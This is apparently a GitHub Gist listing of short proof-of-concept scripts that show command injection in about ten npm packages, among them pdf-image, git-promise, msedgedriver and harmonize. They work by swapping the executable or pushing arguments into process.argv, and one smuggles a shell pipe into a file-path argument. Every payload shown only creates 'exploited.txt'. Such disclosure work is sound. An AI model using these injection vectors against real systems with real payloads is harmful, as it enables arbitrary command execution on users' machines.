Skip to content

Instantly share code, notes, and snippets.

@mcoimbra
mcoimbra / protractor-video-reporter-0.3.0_poc.js
Created October 29, 2023 23:20
Package protractor-video-reporter: it is possible to take advantage of the 'options' argument of the VideoReporter constructor to execute a custom binary and arguments (authors only focus on ffmpeg executables...).
'use strict'
const pkg = require('protractor-video-reporter');
console.log(pkg);
const options = {
ffmpegCmd: 'touch',
ffmpegArgs: ['exploited.txt']
}
@mcoimbra
mcoimbra / postinstall-build-5.0.3_poc.js
Created October 29, 2023 22:29
Package postinstall-build: it is possible to inject a custom command and arguments by pushing into process.argv.
'use strict'
const pkg = require('postinstall-build');
process.argv.push('touch');
process.argv.push('touch exploited.txt');
/*
* This will lead to exec(cmd) with cmd = 'touch exploited.txt' on
* line #326 of src/index.js.
@mcoimbra
mcoimbra / pdf-merge-1.2.0_poc.js
Created October 29, 2023 14:44
Package pdf-merge: it is possible to inject a custom binary and arguments for example to create a local file.
'use strict'
const pkg = require('pdf-merge');
const args = ['exploited.txt', ''];
const options = {
libPath: 'touch'
};
/*
@mcoimbra
mcoimbra / pdf-image-2.0.0_poc.js
Created October 29, 2023 14:27
Package pdf-image: it is possible to inject a custom command to be executed rather than imagemagick (the focus of this package).
'use strict'
const pkg = require('pdf-image');
console.log(pkg);
const pdfFilePath = '" | touch exploited.txt "';
const options = {
};
@mcoimbra
mcoimbra / msedgedriver-91.0.0_poc.js
Created October 29, 2023 14:07
Package msedgedriver: it is possible to manipulate the binary and arguments passed to spawn by changing 'msedgedriver.path' and configuring 'args'.
'use strict'
const pkg = require('msedgedriver');
pkg.path = '/usr/bin/touch';
const args = ['exploited.txt'];
const returnPromise = false;
// This will create a local 'exploited.txt' file.
@mcoimbra
mcoimbra / mocha-multi-reporters-1.5.1_poc.js
Created October 29, 2023 13:57
Package mocha-multi-reporters: potential injection through 'require(name)' in src/lib/MultiReporters.js
'use strict'
const fs = require('node:fs');
const path = require('node:path');
/*
* Create a local 'custom.js' file so that the program flow can
* continue within the call below.
*/
const filename = path.join(process.cwd(), 'custom.js');
@mcoimbra
mcoimbra / karma-cljs-test-0.1.0_poc.js
Created October 28, 2023 22:32
Package karma: although focused on browser JavaScript, it is possible to require() the package and inject a command into another file of the package that is possible to require.
'use strict'
const pkg = require('karma-cljs-test');
const init = pkg['framework:cljs-test'][1];
const files = [];
init(files);
@mcoimbra
mcoimbra / harmonize-2.0.0_poc.js
Last active October 28, 2023 21:42
Package harmonize: by editing the process.argv it is possible to influence the command and flags invoked inside harmonize.
'use strict'
const pkg = require('harmonize');
process.argv[0] = 'touch';
process.argv.push('exploited.txt');
const flags = [];
/* This will create a local 'exploited.txt'.
@mcoimbra
mcoimbra / git-rev-0.2.1_poc.js
Created October 28, 2023 15:33
Package git-rev@0.2.1: it is possible to exeute custom code via a callback.
'use strict'
const pkg = require('git-rev');
const cb = function(error_msg) {
const fs = require('node:fs');
let fd = fs.openSync('exploited.txt', 'a');
fs.closeSync(fd);
}
@mcoimbra
mcoimbra / git-promise-1.0.0_poc.js
Created October 28, 2023 15:16
Package git-promise: it is possible through the argument to execute a binary which is not 'git', with the package README.md focusing only on running git commands.
'use strict'
const pkg = require('git-promise');
const commandOrArgs = 'exploited.txt';
const optionsOrCallback = {
gitExec: 'touch'
};
const callbackMaybe = function() {};